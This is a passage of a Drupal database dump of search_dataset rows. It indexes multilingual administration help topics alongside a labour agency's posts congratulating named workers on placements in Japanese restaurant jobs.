(68, 'ja', 'help_search', ' configuring site search what are search pages  the core search module organizes site search into pages  each page allows users to search a particular type of content with a particular configuration the configuration includes specifying a url that starts with search  a name for the page and additional options for some search page types when users visit the main search page see search  they will see the configured search pages that they have access to each search page has a search form on it and the page will display search results after the user enters keywords into the form and clicks the search button what modules provide site search  the core search module provides the ability to configure search pages search page types are provided by both core and contributed modules the core modules that provide search page types are the node module for searching content pages the user module for searching user profiles the help module for searching help topics as an alternative to the core search module s system of search pages you can use contributed modules to provide site search for example the apache solr and sphinx contributed modules use thirdparty technology to provide site search what are the limitations of the core search module  there are two main limitations of the core search module first it is not appropriate for very large sites if you have a large site look into other search technologies like apache solr second the node search page type only supports exact keyword matching which is not the behavior that most users will expect you can improve this by installing a languagespecific stemming module for your language such as porter stemmer for american english which makes it so that for example a search for the word walk would match pages containing the words walk walking and walked what are the search permissions  users with use search permission can use the search form block and search page this permission is required for any search configured in the core search module in addition to use search   view user information permission is needed for searching users in addition to use search   view published content permission is needed for searching content users with use advanced search permission can use more complex search filtering when performing content searches configuring site search overview in order to configure site search using the core search module you will need to configure one or more search pages you will also need to verify or alter permissions so that the desired user roles can search the site see managing user accounts and site visitors for more information about roles and permissions for content search you will also need to make sure that the search index is configured and that the site is fully indexed finally you may wish to place the search form block on pages of your site or add the search page to a navigation menu to give users easy access to search see the related topics listed below for specific tasks additional resources online documentation for the search module ', 1787923659),
(68, 'ja', 'node_search', ' congratulations 2242024  congratulations 2242024 admin tue 6252024 1118 mon 4222024 900  おめで めでと でとう とうご うござ ござい ざいま います  hnin wai wai nwe と thida khine が 2024 年 4 月 22 日に食 に食品 食品サ 品サー サービ ービス レスト ストラ トラン の仕事 仕事に 事に就 に就い 就いて いて日 て日本 北海道 海道へ 道へ出 へ出発 出発す 発する するこ ること ことに とにな になり なりま りまし ました おめで めでと でとう とうご うござ ござい ざいま います  congratulations for two person entering japan hokkaido city with food service restaurant  ', 0),
(68, 'ko', 'help_search', ' configuring site search what are search pages  the core search module organizes site search into pages  each page allows users to search a particular type of content with a particular configuration the configuration includes specifying a url that starts with search  a name for the page and additional options for some search page types when users visit the main search page see search  they will see the configured search pages that they have access to each search page has a search form on it and the page will display search results after the user enters keywords into the form and clicks the search button what modules provide site search  the core search module provides the ability to configure search pages search page types are provided by both core and contributed modules the core modules that provide search page types are the node module for searching content pages the user module for searching user profiles the help module for searching help topics as an alternative to the core search module s system of search pages you can use contributed modules to provide site search for example the apache solr and sphinx contributed modules use thirdparty technology to provide site search what are the limitations of the core search module  there are two main limitations of the core search module first it is not appropriate for very large sites if you have a large site look into other search technologies like apache solr second the node search page type only supports exact keyword matching which is not the behavior that most users will expect you can improve this by installing a languagespecific stemming module for your language such as porter stemmer for american english which makes it so that for example a search for the word walk would match pages containing the words walk walking and walked what are the search permissions  users with use search permission can use the search form block and search page this permission is required for any search configured in the core search module in addition to use search   view user information permission is needed for searching users in addition to use search   view published content permission is needed for searching content users with use advanced search permission can use more complex search filtering when performing content searches configuring site search overview in order to configure site search using the core search module you will need to configure one or more search pages you will also need to verify or alter permissions so that the desired user roles can search the site see managing user accounts and site visitors for more information about roles and permissions for content search you will also need to make sure that the search index is configured and that the site is fully indexed finally you may wish to place the search form block on pages of your site or add the search page to a navigation menu to give users easy access to search see the related topics listed below for specific tasks additional resources online documentation for the search module ', 1787923659),
(69, 'en', 'help_search', ' creating and using shortcut administrative links goal create view and use a set of shortcuts to access administrative pages what are shortcuts  shortcuts are quick links to administrative pages they are managed by the core shortcut module a site can have one or more shortcut sets  which can be shared by one or more users by default there is only one set shared by all users each set contains a limited number of shortcuts users need use shortcuts permission to view shortcuts  edit current shortcut set permission to add delete or edit the shortcuts in the set assigned to them and select any shortcut set permission to select a different shortcut set when editing their user profile there is also an administer shortcuts permission which allows an administrator to do any of these actions as well as select shortcut sets for other users steps make sure that the core shortcut module is installed and that you have a role with edit current shortcut set or administer shortcuts permission also make sure that a toolbar module is installed either the core toolbar module or a contributed module replacement navigate to an administrative page that you want in your shortcut list click the shortcut link to add the page to your shortcut list in the core claro administrative theme the link looks like a star and is displayed next to the page title however if the page is already in your shortcut set clicking the shortcut link will remove it from your shortcut set repeat until all the desired links have been added to your shortcut set click shortcuts in the toolbar to display your shortcuts and verify that the list is complete optionally click edit shortcuts at the right end of the shortcut list left end in righttoleft languages to remove links or change their order click any link in the shortcut bar to go directly to the administrative page  ', 1787923659),
(69, 'en', 'node_search', ' congratulations 942024  congratulations 942024 admin tue 6252024 1140 tue 4092024 900 congratulations september 4 2024 the first from new comet agency to akita japan i am proud of the eight person who cherish their ancestors and work hard congratulations may everything go well good luck in japan thank you all to those who trusted us and cooperated with us i will send you to japan with more work requests so please trust me and work for new comet agency  ', 0),
(69, 'ja', 'help_search', ' creating and using shortcut administrative links goal create view and use a set of shortcuts to access administrative pages what are shortcuts  shortcuts are quick links to administrative pages they are managed by the core shortcut module a site can have one or more shortcut sets  which can be shared by one or more users by default there is only one set shared by all users each set contains a limited number of shortcuts users need use shortcuts permission to view shortcuts  edit current shortcut set permission to add delete or edit the shortcuts in the set assigned to them and select any shortcut set permission to select a different shortcut set when editing their user profile there is also an administer shortcuts permission which allows an administrator to do any of these actions as well as select shortcut sets for other users steps make sure that the core shortcut module is installed and that you have a role with edit current shortcut set or administer shortcuts permission also make sure that a toolbar module is installed either the core toolbar module or a contributed module replacement navigate to an administrative page that you want in your shortcut list click the shortcut link to add the page to your shortcut list in the core claro administrative theme the link looks like a star and is displayed next to the page title however if the page is already in your shortcut set clicking the shortcut link will remove it from your shortcut set repeat until all the desired links have been added to your shortcut set click shortcuts in the toolbar to display your shortcuts and verify that the list is complete optionally click edit shortcuts at the right end of the shortcut list left end in righttoleft languages to remove links or change their order click any link in the shortcut bar to go directly to the administrative page  ', 1787923659),
(69, 'ja', 'node_search', ' congratulations 942024  congratulations 942024 admin tue 6252024 1126 tue 4092024 900 congratulations 2024 年 9 月 4 日 new comet agency から日 ら日本 日本の 本の秋 の秋田 秋田へ 田への への最 の最初 最初の 先祖を 祖を大 を大切 大切に 切に仕 に仕事 仕事に 事に取 に取り 取り組 り組む 8 人の姉 の姉妹 姉妹を 妹を誇 を誇り 誇りに りに思 に思い 思いま います おめで めでと でとう とうご うござ ござい ざいま います すべて べてが てがう がうま うまく まくい くいき いきま きます ますよ すよう ように 日本で 本でも でも頑 も頑張 頑張っ 張って ってく てくだ くださ ださい 私たち たちを ちを信 を信頼 信頼し 頼して して協 て協力 協力し 力して してく てくれ くれた れた姉 た姉妹 姉妹た 妹たち たちに ちに感 に感謝 感謝し 謝しま します さらな らなる なる仕 る仕事 仕事の 事の依 の依頼 依頼と 頼とと ととも ともに もにあ にあな あなた なたを たを日 を日本 日本に 本に送 に送り 送りま ります ますの すので 私を信 を信じ 信じて new comet agency で働い 働いて いてく てくだ くださ ださい  ', 0),
(69, 'ko', 'help_search', ' creating and using shortcut administrative links goal create view and use a set of shortcuts to access administrative pages what are shortcuts  shortcuts are quick links to administrative pages they are managed by the core shortcut module a site can have one or more shortcut sets  which can be shared by one or more users by default there is only one set shared by all users each set contains a limited number of shortcuts users need use shortcuts permission to view shortcuts  edit current shortcut set permission to add delete or edit the shortcuts in the set assigned to them and select any shortcut set permission to select a different shortcut set when editing their user profile there is also an administer shortcuts permission which allows an administrator to do any of these actions as well as select shortcut sets for other users steps make sure that the core shortcut module is installed and that you have a role with edit current shortcut set or administer shortcuts permission also make sure that a toolbar module is installed either the core toolbar module or a contributed module replacement navigate to an administrative page that you want in your shortcut list click the shortcut link to add the page to your shortcut list in the core claro administrative theme the link looks like a star and is displayed next to the page title however if the page is already in your shortcut set clicking the shortcut link will remove it from your shortcut set repeat until all the desired links have been added to your shortcut set click shortcuts in the toolbar to display your shortcuts and verify that the list is complete optionally click edit shortcuts at the right end of the shortcut list left end in righttoleft languages to remove links or change their order click any link in the shortcut bar to go directly to the administrative page  ', 1787923659),
(70, 'en', 'help_search', ' clearing the site cache goal clear the data in the site cache what is the cache  some of the calculations that are done when your site loads a page take a long time to run to save time when these calculations would need to be done again their results can be cached in your site s database there are internal mechanisms to clear cached data when the conditions or assumptions that went into the calculation have changed but you can also clear cached data manually when your site is misbehaving a good first step is to clear the cache and see if the problem goes away steps in the manage administrative menu navigate to configuration   development   performance  click clear all caches  your site s cached data will be cleared additional resources concept cache drupal user guide  ', 1787923659),
(70, 'en', 'node_search', ' congrats congrats admin tue 6252024 1228 congratulations  congratulations to tin zar win myint for passing the interview for tokutei gaishoku restaurant  ', 0),
(70, 'ja', 'help_search', ' clearing the site cache goal clear the data in the site cache what is the cache  some of the calculations that are done when your site loads a page take a long time to run to save time when these calculations would need to be done again their results can be cached in your site s database there are internal mechanisms to clear cached data when the conditions or assumptions that went into the calculation have changed but you can also clear cached data manually when your site is misbehaving a good first step is to clear the cache and see if the problem goes away steps in the manage administrative menu navigate to configuration   development   performance  click clear all caches  your site s cached data will be cleared additional resources concept cache drupal user guide  ', 1787923659),
(70, 'ja', 'node_search', ' congrats congrats admin tue 6252024 1245  おめで めでと でとう とうご うござ ござい ざいま います   特定外 定外食 レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 格した tin zar win myint さん おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(70, 'ko', 'help_search', ' clearing the site cache goal clear the data in the site cache what is the cache  some of the calculations that are done when your site loads a page take a long time to run to save time when these calculations would need to be done again their results can be cached in your site s database there are internal mechanisms to clear cached data when the conditions or assumptions that went into the calculation have changed but you can also clear cached data manually when your site is misbehaving a good first step is to clear the cache and see if the problem goes away steps in the manage administrative menu navigate to configuration   development   performance  click clear all caches  your site s cached data will be cleared additional resources concept cache drupal user guide  ', 1787923659),
(71, 'en', 'help_search', ' changing basic site settings goal configure the basic settings of your site including the site name slogan main email address default time zone default country and the date formats to use steps in the manage administrative menu navigate to configuration   system   basic site settings  enter the site name slogan and main email address for your site click save configuration  you should see a message indicating that the settings were saved in the manage administrative menu navigate to configuration   region and language   regional settings  select the default country and default time zone for your site click save configuration  you should see a message indicating that the settings were saved in the manage administrative menu navigate to configuration   region and language   date and time formats  look at the patterns for the default long medium and short date formats if any of them does not match the date format you want to use on your site click edit in that row to edit the format adjust the format string until the displayed format matches what you want date format strings are composed of php date format codes click save format  you should see a message indicating that the format was saved repeat the previous three steps for any other date formats that need to be changed additional resources php date format codes reference ', 1787923659),
(71, 'en', 'node_search', ' congratulations  congratulations admin tue 6252024 1229 mon 5202024 2100 congratulations congratulations to ei ei wai for passing the interview for tokutei gaishoku restaurant  ', 0),
(71, 'ja', 'help_search', ' changing basic site settings goal configure the basic settings of your site including the site name slogan main email address default time zone default country and the date formats to use steps in the manage administrative menu navigate to configuration   system   basic site settings  enter the site name slogan and main email address for your site click save configuration  you should see a message indicating that the settings were saved in the manage administrative menu navigate to configuration   region and language   regional settings  select the default country and default time zone for your site click save configuration  you should see a message indicating that the settings were saved in the manage administrative menu navigate to configuration   region and language   date and time formats  look at the patterns for the default long medium and short date formats if any of them does not match the date format you want to use on your site click edit in that row to edit the format adjust the format string until the displayed format matches what you want date format strings are composed of php date format codes click save format  you should see a message indicating that the format was saved repeat the previous three steps for any other date formats that need to be changed additional resources php date format codes reference ', 1787923659),
(71, 'ja', 'node_search', ' congratulations  congratulations admin tue 6252024 1250 mon 5202024 2100 おめで めでと でとう とうご うござ ござい ざいま います 特定外 定外食 レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 格した ei ei waei ei wai さん おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(71, 'ko', 'help_search', ' changing basic site settings goal configure the basic settings of your site including the site name slogan main email address default time zone default country and the date formats to use steps in the manage administrative menu navigate to configuration   system   basic site settings  enter the site name slogan and main email address for your site click save configuration  you should see a message indicating that the settings were saved in the manage administrative menu navigate to configuration   region and language   regional settings  select the default country and default time zone for your site click save configuration  you should see a message indicating that the settings were saved in the manage administrative menu navigate to configuration   region and language   date and time formats  look at the patterns for the default long medium and short date formats if any of them does not match the date format you want to use on your site click edit in that row to edit the format adjust the format string until the displayed format matches what you want date format strings are composed of php date format codes click save format  you should see a message indicating that the format was saved repeat the previous three steps for any other date formats that need to be changed additional resources php date format codes reference ', 1787923659),
(72, 'en', 'help_search', ' configuring error responses including 403404 pages goal set up your site to respond appropriately to site errors including 403 and 404 page responses what are 403 and 404 responses  when a user visits a web page the web server sends a response code in addition to the page content a normal nonerror response has code 200 if the page does not exist on the site the response code is 404 if the page exists but the user is not authorized to visit the page the response code is 403 the core software provides default responses for both 403 and 404 codes but if you prefer you can create your own pages for each what other errors can occur  under some situations your site can generate error messages these can be due to user errors such as entering invalid values in a form or incorrect configuration php runtime errors or software bugs some errors may result in a white screen of death  a totally blank web page response less drastic errors will generate error messages you can configure what happens when an error message is generated steps if desired create pages to use for 403 and 404 responses note the urls for these pages in the manage administrative menu navigate to configuration   system   basic site settings  in the error pages section enter the url for your 403404 pages starting after the site home page url for example if your site url is https examplecom and your 404 page is https examplecom notfound  you would enter  notfound  click save configuration  you should see a message indicating that the settings were saved in the manage administrative menu navigate to configuration   development   logging and errors  for a production site select none under error messages to display  for a site that is in development select one of the other options so that you are more aware of the errors the site is generating click save configuration  you should see a message indicating that the settings were saved  ', 1787923659),
(72, 'en', 'node_search', ' congratulations  congratulations admin tue 6252024 1257 mon 5202024 900 congratulations  congratulations to yaw chang for passing the interview for tokutei gaishoku restaurant  ', 0),
(72, 'ja', 'help_search', ' configuring error responses including 403404 pages goal set up your site to respond appropriately to site errors including 403 and 404 page responses what are 403 and 404 responses  when a user visits a web page the web server sends a response code in addition to the page content a normal nonerror response has code 200 if the page does not exist on the site the response code is 404 if the page exists but the user is not authorized to visit the page the response code is 403 the core software provides default responses for both 403 and 404 codes but if you prefer you can create your own pages for each what other errors can occur  under some situations your site can generate error messages these can be due to user errors such as entering invalid values in a form or incorrect configuration php runtime errors or software bugs some errors may result in a white screen of death  a totally blank web page response less drastic errors will generate error messages you can configure what happens when an error message is generated steps if desired create pages to use for 403 and 404 responses note the urls for these pages in the manage administrative menu navigate to configuration   system   basic site settings  in the error pages section enter the url for your 403404 pages starting after the site home page url for example if your site url is https examplecom and your 404 page is https examplecom notfound  you would enter  notfound  click save configuration  you should see a message indicating that the settings were saved in the manage administrative menu navigate to configuration   development   logging and errors  for a production site select none under error messages to display  for a site that is in development select one of the other options so that you are more aware of the errors the site is generating click save configuration  you should see a message indicating that the settings were saved  ', 1787923659),
(72, 'ja', 'node_search', ' congratulations  congratulations admin tue 6252024 1310 mon 5202024 900  おめで めでと でとう とうご うござ ござい ざいま います   特定外 定外食 レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 格した yaw chanyaw chang さん おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(72, 'ko', 'help_search', ' configuring error responses including 403404 pages goal set up your site to respond appropriately to site errors including 403 and 404 page responses what are 403 and 404 responses  when a user visits a web page the web server sends a response code in addition to the page content a normal nonerror response has code 200 if the page does not exist on the site the response code is 404 if the page exists but the user is not authorized to visit the page the response code is 403 the core software provides default responses for both 403 and 404 codes but if you prefer you can create your own pages for each what other errors can occur  under some situations your site can generate error messages these can be due to user errors such as entering invalid values in a form or incorrect configuration php runtime errors or software bugs some errors may result in a white screen of death  a totally blank web page response less drastic errors will generate error messages you can configure what happens when an error message is generated steps if desired create pages to use for 403 and 404 responses note the urls for these pages in the manage administrative menu navigate to configuration   system   basic site settings  in the error pages section enter the url for your 403404 pages starting after the site home page url for example if your site url is https examplecom and your 404 page is https examplecom notfound  you would enter  notfound  click save configuration  you should see a message indicating that the settings were saved in the manage administrative menu navigate to configuration   development   logging and errors  for a production site select none under error messages to display  for a site that is in development select one of the other options so that you are more aware of the errors the site is generating click save configuration  you should see a message indicating that the settings were saved  ', 1787923659),
(73, 'en', 'help_search', ' enabling and disabling maintenance mode goal put your site in maintenance mode to perform maintenance operations and then return to normal mode when finished what is maintenance mode  when your site is in maintenance mode most site visitors will see a simple maintenance mode message page rather than being able to use the full functionality of the site users with use the site in maintenance mode permission who are already logged in will be able to use the full site and the log in page at  user will also be accessible to anyone steps in the manage administrative menu navigate to configuration   development   maintenance mode  check put site into maintenance mode  optionally change the message to display when in maintenance mode  and click save configuration  your site will be in maintenance mode perform your maintenance operations in the manage administrative menu navigate to configuration   development   maintenance mode  uncheck put site into maintenance mode and click save configuration  your site will be back in normal operation mode clear the site cache see clearing the site cache for instructions  ', 1787923659),
(73, 'en', 'node_search', ' congratulations 1952024  congratulations 1952024 admin tue 6252024 1258 sun 5192024 900 congratulations  congratulations for khin khin kyaw thet myat myat khaing win pyae shan hnin thazin aung yu ya nway for departing to japan tokyo with tokueti gaishoku restaurant job have a safe flight  ', 0),
(73, 'ja', 'help_search', ' enabling and disabling maintenance mode goal put your site in maintenance mode to perform maintenance operations and then return to normal mode when finished what is maintenance mode  when your site is in maintenance mode most site visitors will see a simple maintenance mode message page rather than being able to use the full functionality of the site users with use the site in maintenance mode permission who are already logged in will be able to use the full site and the log in page at  user will also be accessible to anyone steps in the manage administrative menu navigate to configuration   development   maintenance mode  check put site into maintenance mode  optionally change the message to display when in maintenance mode  and click save configuration  your site will be in maintenance mode perform your maintenance operations in the manage administrative menu navigate to configuration   development   maintenance mode  uncheck put site into maintenance mode and click save configuration  your site will be back in normal operation mode clear the site cache see clearing the site cache for instructions  ', 1787923659),
(73, 'ja', 'node_search', ' congratulations 1952024  congratulations 1952024 admin tue 6252024 1316 sun 5192024 900  おめで めでと でとう とうご うござ ござい ざいま います   おめで めでと でとう とうご うござ ござい ざいま います khin khin kyaw thet myat myat khaing win pyae shan hnin thazin aung yu ya nway 特恵外 恵外食 レスト ストラ トラン の仕事 仕事の 事のた のため 東京へ 京へ出 へ出発 安全な 全な旅 な旅を 旅を祈 を祈り 祈りま ります  ', 0),
(73, 'ko', 'help_search', ' enabling and disabling maintenance mode goal put your site in maintenance mode to perform maintenance operations and then return to normal mode when finished what is maintenance mode  when your site is in maintenance mode most site visitors will see a simple maintenance mode message page rather than being able to use the full functionality of the site users with use the site in maintenance mode permission who are already logged in will be able to use the full site and the log in page at  user will also be accessible to anyone steps in the manage administrative menu navigate to configuration   development   maintenance mode  check put site into maintenance mode  optionally change the message to display when in maintenance mode  and click save configuration  your site will be in maintenance mode perform your maintenance operations in the manage administrative menu navigate to configuration   development   maintenance mode  uncheck put site into maintenance mode and click save configuration  your site will be back in normal operation mode clear the site cache see clearing the site cache for instructions  ', 1787923659),
(74, 'en', 'help_search', ' installing a module goal install a core module or a contributed module that has already been downloaded steps in the manage administrative menu navigate to extend  enter a word from the module name or description into the filter box to make the list of modules smaller locate the module you want to install check the box next to the name of the module you want to install you can also check more than one box to install multiple modules at the same time if the checkbox is disabled for the module you are trying to install expand the information to see why you may need to download an additional module that your module requires click install at the bottom of the page if you chose to install a module with dependencies that were not already installed or if you chose an experimental module confirm your choice on the next page wait for the module or modules to be installed you should be returned to the extend page with a message saying the module or modules were installed  ', 1787923659),
(74, 'en', 'node_search', ' congratulations  congratulations admin tue 6252024 1312 mon 5202024 900 congratulations  congratulations to kyaw naing in passing the interview for tokutei gaishoku restaurant  ', 0),
(74, 'ja', 'help_search', ' installing a module goal install a core module or a contributed module that has already been downloaded steps in the manage administrative menu navigate to extend  enter a word from the module name or description into the filter box to make the list of modules smaller locate the module you want to install check the box next to the name of the module you want to install you can also check more than one box to install multiple modules at the same time if the checkbox is disabled for the module you are trying to install expand the information to see why you may need to download an additional module that your module requires click install at the bottom of the page if you chose to install a module with dependencies that were not already installed or if you chose an experimental module confirm your choice on the next page wait for the module or modules to be installed you should be returned to the extend page with a message saying the module or modules were installed  ', 1787923659),
(74, 'ja', 'node_search', ' congratulations  congratulations admin tue 6252024 1320 mon 5202024 900  おめで めでと でとう とうご うござ ござい ざいま います   特定外 定外食 レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 格した kyaw naing さん おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(74, 'ko', 'help_search', ' installing a module goal install a core module or a contributed module that has already been downloaded steps in the manage administrative menu navigate to extend  enter a word from the module name or description into the filter box to make the list of modules smaller locate the module you want to install check the box next to the name of the module you want to install you can also check more than one box to install multiple modules at the same time if the checkbox is disabled for the module you are trying to install expand the information to see why you may need to download an additional module that your module requires click install at the bottom of the page if you chose to install a module with dependencies that were not already installed or if you chose an experimental module confirm your choice on the next page wait for the module or modules to be installed you should be returned to the extend page with a message saying the module or modules were installed  ', 1787923659),
(75, 'en', 'help_search', ' uninstalling a module goal uninstall a module your site should be in maintenance mode when you uninstall modules see enabling and disabling maintenance mode for details steps in the manage administrative menu navigate to extend   uninstall  enter a word from the module name or description into the filter box to make the list of modules smaller locate the module you want to uninstall in the description column see if there are reasons that this module cannot be uninstalled for example you may have created content using this module which you would need to delete first or there may be another module installed that requires this module to be installed you would need to uninstall the other module first if there are no reasons listed the module can be uninstalled check the box in the uninstall column next to the module s name click uninstall at the bottom of the page verify the list of modules to be uninstalled and configuration to be deleted on the confirmation page and click uninstall  wait for the module to be uninstalled you should be returned to the uninstall page with a message saying the module was uninstalled  ', 1787923659),
(75, 'en', 'node_search', ' congratulations to chit sayah oo  congratulations to chit sayah oo admin tue 6252024 1404 mon 5202024 900 congratulations  congratulations to chit sayah oo in passing interview for tokutei gaishoku restaurant  ', 0),
(75, 'ja', 'help_search', ' uninstalling a module goal uninstall a module your site should be in maintenance mode when you uninstall modules see enabling and disabling maintenance mode for details steps in the manage administrative menu navigate to extend   uninstall  enter a word from the module name or description into the filter box to make the list of modules smaller locate the module you want to uninstall in the description column see if there are reasons that this module cannot be uninstalled for example you may have created content using this module which you would need to delete first or there may be another module installed that requires this module to be installed you would need to uninstall the other module first if there are no reasons listed the module can be uninstalled check the box in the uninstall column next to the module s name click uninstall at the bottom of the page verify the list of modules to be uninstalled and configuration to be deleted on the confirmation page and click uninstall  wait for the module to be uninstalled you should be returned to the uninstall page with a message saying the module was uninstalled  ', 1787923659),
(75, 'ja', 'node_search', ' chit sayah oo さん おめで めでと でとう とうご うござ ござい ざいま います  chit sayah oo さん おめで めでと でとう とうご うござ ござい ざいま います admin tue 6252024 1414 mon 5202024 900  おめで めでと でとう とうご うござ ござい ざいま います   特定外 定外食 レスト ストラ トラン の面接 面接に 接に合 に合格 合格し 格した chitt sayar oo さん おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(75, 'ko', 'help_search', ' uninstalling a module goal uninstall a module your site should be in maintenance mode when you uninstall modules see enabling and disabling maintenance mode for details steps in the manage administrative menu navigate to extend   uninstall  enter a word from the module name or description into the filter box to make the list of modules smaller locate the module you want to uninstall in the description column see if there are reasons that this module cannot be uninstalled for example you may have created content using this module which you would need to delete first or there may be another module installed that requires this module to be installed you would need to uninstall the other module first if there are no reasons listed the module can be uninstalled check the box in the uninstall column next to the module s name click uninstall at the bottom of the page verify the list of modules to be uninstalled and configuration to be deleted on the confirmation page and click uninstall  wait for the module to be uninstalled you should be returned to the uninstall page with a message saying the module was uninstalled  ', 1787923659),
(76, 'en', 'help_search', ' running reports on your site goal run reports to learn about the status and health of your site steps in the manage administrative menu navigate to reports   status report to see a report that summarizes the health and status of your site if there are any warnings or errors you will need to fix them take note of any upcoming highly critical security releases that may impact your site if you have the core database logging module installed in the manage administrative menu navigate to reports   recent log messages to see a report of the error and informational messages your site has generated you can filter the report by severity to see only the most critical messages if desired if you have the core update manager module installed in the manage administrative menu navigate to reports   available updates to see a report of the updates that are available for your site software if last checked is far in the past click check manually to update the report scan the report if the core software or any modules or themes have security updates available you should update them as soon as possible additional resources security and maintenance drupal user guide   which includes information on how to update your site s core software modules and themes  ', 1787923659),
(76, 'en', 'node_search', ' congratulations 1952024  congratulations 1952024 admin tue 6252024 1413 sun 5192024 900 congratulations  congratulations for nan su khaing wut yee aung for departure to japan nagasaki  congratulations for nan su khaing wut yee aung  ', 0),
(76, 'ja', 'help_search', ' running reports on your site goal run reports to learn about the status and health of your site steps in the manage administrative menu navigate to reports   status report to see a report that summarizes the health and status of your site if there are any warnings or errors you will need to fix them take note of any upcoming highly critical security releases that may impact your site if you have the core database logging module installed in the manage administrative menu navigate to reports   recent log messages to see a report of the error and informational messages your site has generated you can filter the report by severity to see only the most critical messages if desired if you have the core update manager module installed in the manage administrative menu navigate to reports   available updates to see a report of the updates that are available for your site software if last checked is far in the past click check manually to update the report scan the report if the core software or any modules or themes have security updates available you should update them as soon as possible additional resources security and maintenance drupal user guide   which includes information on how to update your site s core software modules and themes  ', 1787923659),
(76, 'ja', 'node_search', ' congratulations 1952024  congratulations 1952024 admin tue 6252024 1421 sun 5192024 900  おめで めでと でとう とうご うござ ござい ざいま います  nan su khaing と wut yee aung の日本 長崎へ 崎への への出 の出発 出発お 発おめ おめで めでと でとう とうご うござ ござい ざいま います  congratulations for nan su khaing wut yee aung  ', 0),
(76, 'ko', 'help_search', ' running reports on your site goal run reports to learn about the status and health of your site steps in the manage administrative menu navigate to reports   status report to see a report that summarizes the health and status of your site if there are any warnings or errors you will need to fix them take note of any upcoming highly critical security releases that may impact your site if you have the core database logging module installed in the manage administrative menu navigate to reports   recent log messages to see a report of the error and informational messages your site has generated you can filter the report by severity to see only the most critical messages if desired if you have the core update manager module installed in the manage administrative menu navigate to reports   available updates to see a report of the updates that are available for your site software if last checked is far in the past click check manually to update the report scan the report if the core software or any modules or themes have security updates available you should update them as soon as possible additional resources security and maintenance drupal user guide   which includes information on how to update your site s core software modules and themes  ', 1787923659),
(77, 'en', 'help_search', ' installing a theme and setting default themes goal install a core theme or a contributed theme that has already been downloaded choose the default themes to use for the site and for administrative pages steps in the manage administrative menu navigate to appearance  locate the themes that you want to use as the site default theme and for administrative pages for each of these themes if the theme is in the uninstalled themes section click the install link to install the theme wait for the theme to be installed translations might be downloaded you should be returned to the appearance page locate the theme that you want to be your default theme which should now be in the installed themes section if it is not already labeled as the default theme  click the set as default link at the bottom of the page select the administration theme that you want to use on administrative pages click save configuration if you selected a new theme if you changed the default theme for your site visit the site home page or another page on the nonadministration part of your site and verify that the site is using the new theme if you changed the administration theme verify that the new theme is used on administrative pages  ', 1787923659),
(77, 'en', 'node_search', ' congratulations 2562024  congratulations 2562024 admin tue 6252024 1426 tue 6252024 900 congratulations  2562024 while accompanying 3 workers who will go to work at a large restaurant in tokyo japan  congratulations to aung zin oo hnin ei phyu ei shwe zin   take care of your health   strictly follow working hours  treat work as if it were your own work and work hard to do it   learn to understand japanese culture congratulations to aung zin oo hnin ei phyu ei shwe zin  ', 0),
(77, 'ja', 'help_search', ' installing a theme and setting default themes goal install a core theme or a contributed theme that has already been downloaded choose the default themes to use for the site and for administrative pages steps in the manage administrative menu navigate to appearance  locate the themes that you want to use as the site default theme and for administrative pages for each of these themes if the theme is in the uninstalled themes section click the install link to install the theme wait for the theme to be installed translations might be downloaded you should be returned to the appearance page locate the theme that you want to be your default theme which should now be in the installed themes section if it is not already labeled as the default theme  click the set as default link at the bottom of the page select the administration theme that you want to use on administrative pages click save configuration if you selected a new theme if you changed the default theme for your site visit the site home page or another page on the nonadministration part of your site and verify that the site is using the new theme if you changed the administration theme verify that the new theme is used on administrative pages  ', 1787923659),
(77, 'ja', 'node_search', ' congratulations 2562024  congratulations 2562024 admin tue 6252024 1519 tue 6252024 900  おめで めでと でとう とうご うござ ござい ざいま います  2024 年 6 月 25 日 東京の 京の大 の大型 大型レ 型レス レスト ストラ トラン ランで ンで働 で働く 3 人の従 の従業 従業員 業員に 員に同 に同行 同行中  aung zin oo hnin ei phyu ei shwe zin おめで めでと でとう とうご うござ ござい ざいま います   健康に 康に気 に気を 気を付 を付け 付けて けてく てくだ くださ ださい   勤務時 務時間 時間を 間を厳 を厳守 厳守し 守して してく てくだ くださ ださい   仕事を 事を自 を自分 自分の 分の仕 の仕事 仕事の 事のよ のよう ように うに扱 に扱い 一生懸 生懸命 懸命に 命に取 に取り 取り組 り組ん 組んで んでく でくだ くださ ださい   日本の 本の文 の文化 文化を 化を理 を理解 理解し 解して してく てくだ くださ ださい  congratulations to aung zin oo hnin ei phyu ei shwe zin  ', 0),
(77, 'ko', 'help_search', ' installing a theme and setting default themes goal install a core theme or a contributed theme that has already been downloaded choose the default themes to use for the site and for administrative pages steps in the manage administrative menu navigate to appearance  locate the themes that you want to use as the site default theme and for administrative pages for each of these themes if the theme is in the uninstalled themes section click the install link to install the theme wait for the theme to be installed translations might be downloaded you should be returned to the appearance page locate the theme that you want to be your default theme which should now be in the installed themes section if it is not already labeled as the default theme  click the set as default link at the bottom of the page select the administration theme that you want to use on administrative pages click save configuration if you selected a new theme if you changed the default theme for your site visit the site home page or another page on the nonadministration part of your site and verify that the site is using the new theme if you changed the administration theme verify that the new theme is used on administrative pages  ', 1787923659),
(78, 'en', 'help_search', ' uninstalling an unused theme goal uninstall a theme that was previously installed but is no longer being used on the site steps in the manage administrative menu navigate to appearance  locate the theme that you want to uninstall in the installed themes section click the uninstall link to uninstall the theme if there is not an uninstall link the theme cannot be uninstalled because it is either being used as the site default theme being used as the administration theme  or is the base theme for another installed theme  ', 1787923659),
(78, 'en', 'node_search', ' congratulations 1362024  congratulations 1362024 admin tue 6252024 1536 thu 6132024 900 congratulations  congratulations to nyein ei ei swe ei ei mon for departure to hokkaido japan on 1362024 congrats to ei ei mon nyein ei ei swe  ', 0),
(78, 'ja', 'help_search', ' uninstalling an unused theme goal uninstall a theme that was previously installed but is no longer being used on the site steps in the manage administrative menu navigate to appearance  locate the theme that you want to uninstall in the installed themes section click the uninstall link to uninstall the theme if there is not an uninstall link the theme cannot be uninstalled because it is either being used as the site default theme being used as the administration theme  or is the base theme for another installed theme  ', 1787923659);
INSERT INTO `search_dataset` (`sid`, `langcode`, `type`, `data`, `reindex`) VALUES
